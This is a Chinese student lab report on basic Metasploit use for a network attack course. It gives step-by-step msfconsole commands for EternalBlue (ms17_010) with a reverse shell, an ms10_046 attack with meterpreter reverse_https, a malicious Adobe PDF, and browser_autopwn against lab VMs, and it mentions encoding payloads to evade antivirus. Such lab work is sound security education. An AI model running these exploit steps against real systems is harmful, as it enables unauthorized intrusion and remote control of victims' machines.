• 2018-2019-2 网络对抗技术 20165301 Exp5 MSF基础应用


    2018-2019-2 网络对抗技术 20165301 Exp5 MSF基础应用

    实践原理

    1.MSF攻击方法
    • 主动攻击:扫描主机漏洞,进行攻击
    • 攻击浏览器
    • 攻击其他客户端
    2.MSF的六个模块
    • 查看六种模块源码目录/usr/share/metasploit-framework/modules

    • 渗透攻击模块Exploit Modules:攻击漏洞,把shellcode"背"过去

    • 辅助模块Auxiliary Modules:在进行渗透攻击之前得到目标系统丰富的情报信息,它是攻击的前提

    • 攻击载荷Payload Modules:载荷,一段指令(shellcode),目标系统在被渗透攻击之后去执行的代码

    • 空字段模块Nop Modules

    • 编码模块Encoders

    • 后渗透攻击模块Post:攻击成功之后,动态传输代码使其在被控机执行

    3.MSF的三种用户操作界面
    msfconsole
    • 查看模块的具体信息info[exploits|auxiliary|post|payloads|encoders|nops]
    • 查看设置信息show [options]
    • 查看攻击目标类型show [target]
    • 查找命令search
    • 查找2018年产生的在windows平台下的漏洞search ms18(或CNE:2018) type:exploit platform:windows armitage
    • 启动服务器service postgresql start
    • 启动armitagearmitage
    • webgui
    4.MSF常用漏洞利用命令
    • search name:用指定关键字搜索可以利用的漏洞模块
    • use exploit name:使用漏洞
    • show options:显示配置选项
    • set option name option:设置选项
    • show payloads:回链攻击载荷
    • show targets: 显示目标(os版本)
    • set TARGET target number:设置目标版本
    • exploit:开始漏洞攻击
    • sessions -l:列出会话
    • sessions -i id:选择会话
    • sessions -k id:结束会话
    • Ctrl+z:把会话放到后台
    • Ctrl+c:结束会话
    • show auxiliary:显示辅助模块
    • use auxiliary name :使用辅助模块
    • set option name option:设置选项
    • exploit:运行模块
    2.实践内容概述
    • 一个主动攻击实践,如ms08_067; (1分)

    • 一个针对浏览器的攻击,如ms11_050;(1分)

    • 一个针对客户端的攻击,如Adobe;(1分)

    • 成功应用任何一个辅助模块。(0.5分)

    3.基础问题回答
    • 用自己的话解释什么是exploit,payload,encode
      • exploit是载具,连接漏洞,将payload传送到靶机中。
      • payload是载荷,是exploitshellcode中的主要功能代码,exploit把它送到靶机中后,是真正负责进行攻击代码。
      • encode是编码,用来改变payload,避免payload中出现漏洞无法处理的字符;其次是为了实现免杀,不让杀毒软件很轻易的就发现payload是攻击代码。

    实验步骤

    实验一:使用ms17_010_eternalblue进行主动攻击

    靶机:Windows Server 2008 ,ip地址192.168.216.137

    payload:generic/shell_reverse_tcp

    • 进入msfconsole

    • use exploit/windows/smb/ms17_010_eternalblue.rb //使用该模块

    • show payloads //查看载荷

    • set payload generic/shell_reverse_tcp //使用tcp反弹连接

    • set LHOST 192.168.216.130 //设置攻击机的IP,即KALI的IP地址

    • set LPORT 5301 //设置攻击端口

    • set RHOST 192.168.216.137 //设置靶机IP

    • set target 0 //选择自动目标系统类型

    • exploit进行攻击

    • 攻击成功

    攻击浏览器的实践

    • ms10_046

    • 靶机:Windows 7 + IE8

    • exploit : exploit/windows/smb/ms10_046_shortcut_icon_dllloader

    • payload : windows/meterpreter/reverse_https

    实验步骤
    • search ms10-046 //看看其他的exploit
    • use exploit/windows/smb/ms10_046_shortcut_icon_dllloader //使用漏洞
    • show payloads //显示可用攻击载荷
    • set windows/meterpreter/reverse_https //选择攻击载荷
    • show options //查看配置信息
    • set LHOST 192.168.126.130 //设置监听地址
    • set SRVHOST 192.168.126.130 //设置本地收听地址
    • set LPORT //设置端口号
    • exploit #开始攻击

    • 将生成的URL地址在winXP的IE中打开
    • 但是我在ie中打开失败了,更新ie8.0也没有解决
    • 同学说虚拟机windows XP sp3 中文版,会出现攻击失败的情况,重新更换靶机用windows XP SP3 英文版即可成功

    攻击客户端的实践

    • Adobe
    • 靶机:Windows XP
    • payload : windows/meterpreter/bind_tcp
    实验步骤
    • msfconsole //进入控制台
      -search adobe //进行查找

    • use windows/fileformat/adobe_cooltype_sing //使用漏洞

    • info //查看漏洞具体信息(重点当然是description)

    • set payload windows/meterpreter/bind_tcp //选择攻击载荷

    • show options //查看详细信息

    • set LPORT 5301 //设置端口号

    • set RHOST 192.168.1.148//设置靶机IP地址

    • exploit #攻击

    • 将生成的msf.pdf复制到Windows XP中

    • 攻击成功

    browser_autopwn 辅助模块(成功且唯一)

    • 通过search auxiliary 查找辅助模块,找到适合的进行运行
      过程

    • use auxiliary/server/browser_autopwn

    • info

    • set SRVHOST 192.168.216.130

    • set SRVPORT 5301

    • ````set LHOST 192.168.216.130```

    • run

    • 描述

      描述:这个模块有三个动作。第一个(和默认值)是使用客户端和服务器端组合的“webserver”对HTTP客户端进行指纹识别,然后自动利用它们。接下来是“defangeddetection”,它只执行指纹部分。最后,“list”只打印所有利用Web服务器操作将使用的模块当前匹配和排除选项。还添加了一个“list”命令,与运行action=list相同

    • 攻击成功

    实验总结与体会

    本次实验操作起来较为容易,,因为metasploit攻击漏洞的专一性,所以我在寻找主机上遇到了很多困难。必须要在特定环境和特定触发条件下才能成功。这也是实验的乐趣所在。

  • 相关阅读:
    Java算法练习——整数反转
    Java算法练习—— Z 字形变换
    Java算法练习——最长回文子串
    vs code自动生成html代码
    thinkphp整合后台模板
    composer安装后台模板
    composer(作曲家)安装php-ml
    两个网站
    PHP的开源产品discuz
    onethink中的用户登录session签名
  • 原文地址:https://www.cnblogs.com/CTF5301/p/10745959.html
Copyright © 2020-2023  润新知